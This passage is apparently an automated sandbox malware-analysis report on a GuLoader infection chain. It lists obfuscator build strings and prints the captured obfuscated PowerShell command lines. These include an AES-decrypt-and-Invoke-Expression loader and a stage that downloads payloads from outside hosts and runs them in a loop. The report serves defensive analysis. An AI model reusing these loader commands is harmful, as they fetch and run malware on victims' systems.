                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: em.Core.pdb, source: powershell.exe, 0000000E.00000002.3352588129.0000000007C81000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  VBScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.StdIn();IHost.StdErr();IHost.StdOut();IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.FullName();IWshShell3.Run("powershell.exe -command (('((e4jfunction Decrypt-AESEncryption {Param([Str", "0", "false")
                  Yara detected GuLoader
                  Source: Yara matchFile source: 0000000E.00000002.3375923464.000000000AC25000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Whiffer)$global:Hebenon = [System.Text.Encoding]::ASCII.GetString($Forlis)$global:Desquamations=$Hebenon.substring($Hjsangs,$Destalinising)<#Afslutt Adoptivdtrenes nedrulningen Salin
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Discommend175 $Fugitating120 $Kortspillene), (Wraithy @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Institutionaliser = [AppDomain]::CurrentDomain.GetAss
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Leveringstidspunktet)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($blankoveksel, $false).DefineType($Ly
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Whiffer)$global:Hebenon = [System.Text.Encoding]::ASCII.GetString($Forlis)$global:Desquamations=$Hebenon.substring($Hjsangs,$Destalinising)<#Afslutt Adoptivdtrenes nedrulningen Salin
                  Obfuscated command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu 